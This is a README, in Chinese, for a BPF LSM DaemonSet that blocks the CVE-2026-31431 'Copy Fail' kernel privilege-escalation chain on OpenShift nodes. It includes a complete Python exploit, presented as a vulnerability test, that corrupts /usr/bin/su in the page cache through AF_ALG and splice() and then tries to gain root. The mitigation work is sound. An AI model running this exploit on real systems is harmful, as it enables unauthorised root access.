mrunalp/block-copyfail

GitHub: mrunalp/block-copyfail

基于 BPF LSM 的 DaemonSet 方案，可在不重启 OpenShift 节点的前提下即时阻断 CVE-2026-31431 内核权限提升漏洞利用链。

Stars: 1 | Forks: 2

## 摘要 CVE-2026-31431（“Copy Fail”）是一个 Linux 内核权限提升漏洞存在于 `algif_aead` 加密接口中。攻击者利用带有 `authencesn` 算法和 `splice()` 的 AF\_ALG 套接字来破坏内核页缓存中的任意文件 —— 包括 `/usr/bin/su` 等 setuid 二进制文件。本文档提供了一种使用 BPF LSM DaemonSet 的**零重启修复**方案，该方案仅阻止存在漏洞的 `authencesn` 算法绑定。该方案已在三个独立的 OCP 4.22 集群上进行了端到端测试。 ## 快速开始 ``` # 1. 验证 BPF LSM 已启用 (RHEL CoreOS 9.8 默认启用) oc debug node/ -- chroot /host cat /sys/kernel/security/lsm # 必须包含 "bpf" # 2. 部署 namespace 并授予 privileged SCC oc apply -f daemonset.yaml oc adm policy add-scc-to-user privileged -z default -n block-copyfail # 3. DaemonSet pods 将在所有节点上自动启动 # 4. 验证 oc get pods -n block-copyfail # All nodes should show Running oc logs -n block-copyfail -l app=block-copyfail # 预期: "block-copyfail: blocker active — authencesn bind blocked" ``` 无需重启。无需节点排空。无需 Pod 重启。防护即刻生效，并覆盖所有节点上的所有进程（100% 覆盖）。 ## 目录 1. [漏洞利用原理](#how-the-exploit-works) 2. [确认集群是否存在漏洞](#confirming-vulnerability-on-your-cluster) 3. [BPF LSM DaemonSet 部署](#bpf-lsm-daemonset-deployment) 4. [部署后验证](#post-deployment-verification) 5. [从源代码构建镜像](#building-the-image-from-source) 6. [移除](#removal) ## 漏洞利用原理该漏洞利用链串起了三个内核特性： 1. **AF\_ALG 套接字** — 通过以下方式为内核加密创建用户空间句柄： `socket(AF_ALG, SOCK_SEQPACKET, 0)` 2. **AEAD 绑定** — 绑定到 `authencesn(hmac(sha256),cbc(aes))`，一种特定的认证加密算法 3. **splice() + sendmsg()** — 当源和目标页映射不同时，内核错误地执行了“就地” 操作，破坏了只读文件的页缓存攻击者在页缓存中破坏了 `/usr/bin/su`（无需对该文件的写权限），然后执行它以获取 root 权限。 ## 确认集群是否存在漏洞 ### 步骤 1：保存测试脚本将以下内容保存为 `cve_test.py`。它使用相同的 payload 针对 `/usr/bin/su` 复现了原始漏洞利用的页缓存破坏过程。此破坏仅影响容器的 overlayfs 副本，不会影响主机。 ``` #!/usr/bin/env python3 """CVE-2026-31431 vulnerability test targeting /usr/bin/su.""" import os, sys, socket, hashlib, zlib, ctypes, ctypes.util, subprocess libc = ctypes.CDLL(ctypes.util.find_library("c")) libc.splice.argtypes = [ ctypes.c_int, ctypes.POINTER(ctypes.c_longlong), ctypes.c_int, ctypes.POINTER(ctypes.c_longlong), ctypes.c_size_t, ctypes.c_uint, ] libc.splice.restype = ctypes.c_longlong def _splice(fd_in, fd_out, length, offset_src=None): if offset_src is not None: off = ctypes.c_longlong(offset_src) return libc.splice(fd_in, ctypes.byref(off), fd_out, None, length, 0) return libc.splice(fd_in, None, fd_out, None, length, 0) def d(x): return bytes.fromhex(x) def try_corrupt(fd, offset, payload): SOL_ALG = 279 try: a = socket.socket(38, 5, 0) except OSError as e: print(f" AF_ALG socket creation failed: {e}") return False try: a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))")) except OSError as e: print(f" AF_ALG bind failed: {e}") a.close() return False try: a.setsockopt(SOL_ALG, 1, d('0800010000000010' + '0' * 64)) a.setsockopt(SOL_ALG, 5, None, 4) u, _ = a.accept() o = offset + 4 z = d('00') u.sendmsg( [b"A" * 4 + payload], [(SOL_ALG, 3, z * 4), (SOL_ALG, 2, b'\x10' + z * 19), (SOL_ALG, 4, b'\x08' + z * 3)], 32768, ) r, w = os.pipe() _splice(fd, w, o, offset_src=0) _splice(r, u.fileno(), o) try: u.recv(8 + offset) except Exception: pass os.close(r) os.close(w) u.close() except OSError as e: print(f" Exploit step failed: {e}") a.close() return False a.close() return True TARGET = "/usr/bin/su" print("=== CVE-2026-31431 Vulnerability Test ===") print(f"Target: {TARGET}") print() with open(TARGET, "rb") as f: orig_hash = hashlib.sha256(f.read()).hexdigest() print(f"Original SHA256: {orig_hash}") payload = zlib.decompress(d( "78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d" "209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675" "c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3" )) fd = os.open(TARGET, os.O_RDONLY) i = 0 ok = True print(f"Attempting splice + AF_ALG page-cache corruption " f"({len(payload)} bytes in {len(payload)//4} chunks)...") while i < len(payload): if not try_corrupt(fd, i, payload[i:i+4]): ok = False break i += 4 os.close(fd) if not ok: print() print("RESULT: CANNOT TEST - AF_ALG or splice not available/permitted") sys.exit(2) with open(TARGET, "rb") as f: after_hash = hashlib.sha256(f.read()).hexdigest() print(f"After SHA256: {after_hash}") print() if orig_hash != after_hash: print("PAGE CACHE CORRUPTION: YES - /usr/bin/su was modified in the page cache") else: print("PAGE CACHE CORRUPTION: NO - /usr/bin/su is intact") print() print("RESULT: NOT VULNERABLE") sys.exit(0) print() print("Attempting to execute corrupted /usr/bin/su ...") try: r = subprocess.run([TARGET, "-c", "id"], capture_output=True, timeout=5) stdout = r.stdout.decode(errors="replace").strip() stderr = r.stderr.decode(errors="replace").strip() print(f" exit code: {r.returncode}") if stdout: print(f" stdout: {stdout}") if stderr: print(f" stderr: {stderr}") if "uid=0" in stdout: print() print("RESULT: FULLY EXPLOITABLE - gained root via corrupted su") else: print() print("RESULT: PARTIALLY MITIGATED") print(" Page-cache corruption succeeded (kernel is vulnerable)") print(" Privilege escalation blocked (allowPrivilegeEscalation=false)") except Exception as e: print(f" execution failed: {e}") print() print("RESULT: PARTIALLY MITIGATED") print(" Page-cache corruption succeeded (kernel is vulnerable)") print(" Corrupted binary could not execute") ``` ### 步骤 2：在集群上运行测试 ``` oc create namespace cve-test oc create configmap cve-test-script -n cve-test --from-file=cve_test.py cat <<'EOF' | oc apply -f - apiVersion: v1 kind: Pod metadata: name: cve-test namespace: cve-test annotations: openshift.io/required-scc: restricted-v2 spec: restartPolicy: Never containers: - name: test image: registry.access.redhat.com/ubi9/python-39:latest command: ["python3", "/scripts/cve_test.py"] volumeMounts: - name: script mountPath: /scripts readOnly: true volumes: - name: script configMap: name: cve-test-script EOF ``` ### 步骤 3：检查结果 ``` oc wait pod/cve-test -n cve-test \ --for=jsonpath='{.status.phase}'=Succeeded --timeout=120s oc logs -n cve-test cve-test ``` **在存在漏洞的集群上**，您将看到： ``` === CVE-2026-31431 Vulnerability Test === Target: /usr/bin/su Original SHA256: 8969560ae8e6e21c6184c1451f59418822ee69dd5d946d71987b55236bbc0feb Attempting splice + AF_ALG page-cache corruption (160 bytes in 40 chunks)... After SHA256: 30b0f5b5a054c4df65b48ca792863bf7054b4d793f15f57163792ba6c2b151ae PAGE CACHE CORRUPTION: YES - /usr/bin/su was modified in the page cache Attempting to execute corrupted /usr/bin/su ... exit code: 0 RESULT: PARTIALLY MITIGATED Page-cache corruption succeeded (kernel is vulnerable) Privilege escalation blocked (allowPrivilegeEscalation=false) ``` ### 步骤 4：清理 ``` oc delete namespace cve-test ``` ## BPF LSM DaemonSet 部署 BPF LSM 方法在内核级别挂钩 `socket_bind`，并仅阻止 `authencesn` 算法的绑定。它基于 [block-copyfail](https://github.com/atgreen/block-copyfail)，使用 libbpf 以 C 语言重写，以便于 OCP 部署。 ### 前置条件必须启用 BPF LSM。RHEL CoreOS 9.8 (OCP 4.22) 默认已启用。请使用以下命令验证： ``` oc debug node/ -- chroot /host cat /sys/kernel/security/lsm ``` 预期输出包含 `bpf`： ``` lockdown,capability,landlock,yama,selinux,bpf ``` 如果 `bpf` **不**存在，则需要一次性 MachineConfig（这是唯一需要重启的场景）： ``` apiVersion: machineconfiguration.openshift.io/v1 kind: MachineConfig metadata: labels: machineconfiguration.openshift.io/role: worker name: 99-enable-bpf-lsm spec: kernelArguments: - lsm=lockdown,capability,selinux,bpf ``` ### 步骤 1：创建命名空间、授予 SCC 并部署必须在创建 DaemonSet Pod 之前授予特权 SCC，否则 Pod 创建将失败并报 SCC 验证错误。 ``` # 创建 namespace cat <<'EOF' | oc apply -f - apiVersion: v1 kind: Namespace metadata: name: block-copyfail labels: pod-security.kubernetes.io/enforce: privileged pod-security.kubernetes.io/audit: privileged pod-security.kubernetes.io/warn: privileged EOF # 将 privileged SCC 授予 default service account oc adm policy add-scc-to-user privileged -z default -n block-copyfail # 部署 DaemonSet cat <<'EOF' | oc apply -f - apiVersion: apps/v1 kind: DaemonSet metadata: name: block-copyfail namespace: block-copyfail labels: app: block-copyfail spec: selector: matchLabels: app: block-copyfail template: metadata: labels: app: block-copyfail spec: priorityClassName: system-node-critical tolerations: - operator: Exists containers: - name: blocker image: quay.io/mrunalp/block-copyfail:latest securityContext: privileged: true volumeMounts: - name: bpf mountPath: /sys/fs/bpf - name: btf mountPath: /sys/kernel/btf/vmlinux readOnly: true resources: requests: cpu: 10m memory: 32Mi limits: cpu: 100m memory: 64Mi volumes: - name: bpf hostPath: path: /sys/fs/bpf type: DirectoryOrCreate - name: btf hostPath: path: /sys/kernel/btf/vmlinux type: File terminationGracePeriodSeconds: 5 EOF ``` ### 步骤 2：等待 Pod 在所有节点上启动 ``` oc get pods -n block-copyfail -o wide ``` 预期：每个节点一个 Pod，全部为 `Running` 状态： ``` NAME READY STATUS AGE NODE block-copyfail-2jhzf 1/1 Running 34s ci-...-master-2 block-copyfail-4dfq7 1/1 Running 34s ci-...-master-1 block-copyfail-c2ts8 1/1 Running 34s ci-...-worker-c block-copyfail-ctblk 1/1 Running 34s ci-...-worker-a block-copyfail-m26sx 1/1 Running 34s ci-...-worker-b block-copyfail-xsh6d 1/1 Running 34s ci-...-master-0 ``` ### 步骤 3：验证阻止程序是否处于活动状态 ``` oc logs -n block-copyfail -l app=block-copyfail ``` 预期： ``` block-copyfail: blocker active — authencesn bind blocked ``` ## 部署后验证从[确认是否存在漏洞](#confirming-vulnerability-on-your-cluster)部分重新运行相同的漏洞利用测试。 **在部署 BPF LSM DaemonSet 之后**，输出将是： ``` === CVE-2026-31431 Vulnerability Test === Target: /usr/bin/su Original SHA256: 30b0f5b5a054c4df65b48ca792863bf7054b4d793f15f57163792ba6c2b151ae Attempting splice + AF_ALG page-cache corruption (160 bytes in 40 chunks)... AF_ALG bind failed: [Errno 1] Operation not permitted RESULT: CANNOT TEST - AF_ALG or splice not available/permitted ``` DaemonSet 日志将显示被阻止的尝试： ``` oc logs -n block-copyfail -l app=block-copyfail ``` ``` block-copyfail: blocker active — authencesn bind blocked block-copyfail: BLOCKED pid=16777 comm=python3 time=2026-05-01 16:37:23 ``` ### 验证其他算法未受影响在节点上运行 `verify-algos.py`，以确认仅 `authencesn` 被阻止，而其他 AF\_ALG 算法（GCM、CCM、SHA-256、AES-CBC）继续正常工作： ``` oc debug node/ -- chroot /host python3 -c " import socket tests = [ ('aead', 'gcm(aes)'), ('aead', 'ccm(aes)'), ('aead', 'rfc4106(gcm(aes))'), ('hash', 'sha256'), ('skcipher', 'cbc(aes)'), ('aead', 'authencesn(hmac(sha256),cbc(aes))'), ] for t, n in tests: s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0) try: s.bind((t, n)) print(f' ALLOWED {t}/{n}') except OSError as e: print(f' BLOCKED {t}/{n} -- {e}') finally: s.close() " ``` 预期输出： ``` ALLOWED aead/gcm(aes) ALLOWED aead/ccm(aes) ALLOWED aead/rfc4106(gcm(aes)) ALLOWED hash/sha256 ALLOWED skcipher/cbc(aes) BLOCKED aead/authencesn(hmac(sha256),cbc(aes)) -- [Errno 1] Operation not permitted ``` 这确认了 BPF LSM 仅阻止存在漏洞的算法。 ## 从源代码构建镜像 BPF LSM 阻止程序的源代码位于 `block-copyfail/`： ``` block-copyfail/ block_copyfail.bpf.c # BPF kernel program (LSM hook) block_copyfail.c # Userspace loader (libbpf skeleton) block_copyfail.h # Shared event struct Makefile # Build pipeline Dockerfile # Multi-stage build daemonset.yaml # Namespace + DaemonSet manifest trigger-test.py # Quick validation script ``` 构建并推送： ``` cd block-copyfail/ podman build -t quay.io//block-copyfail:latest . podman push quay.io//block-copyfail:latest ``` Dockerfile 使用多阶段构建：包含 clang/bpftool/libbpf-devel 的 Fedora 用于编译，UBI 9 minimal 用作运行时镜像（约 122 MB）。 ## 移除删除 DaemonSet 会立即移除所有节点上的缓解措施： ``` oc delete -f daemonset.yaml # 或 oc delete namespace block-copyfail ``` 当加载器进程退出时，BPF 程序会自动分离。无需重启或重启 Pod。

标签：0day挖掘, AF_ALG, algif_aead, BPF LSM, Copy Fail, CVE-2026-31431, DaemonSet, Linux内核漏洞, OCP 4.22, OpenShift, RHEL CoreOS, setuid, splice系统调用, Web截图, Web报告查看器, 内核安全, 内核页缓存损坏, 协议分析, 子域名突变, 客户端加密, 容器安全, 库, 应急响应, 权限提升, 漏洞缓解, 目录遍历, 补丁绕过, 请求拦截, 逆向工具, 零重启修复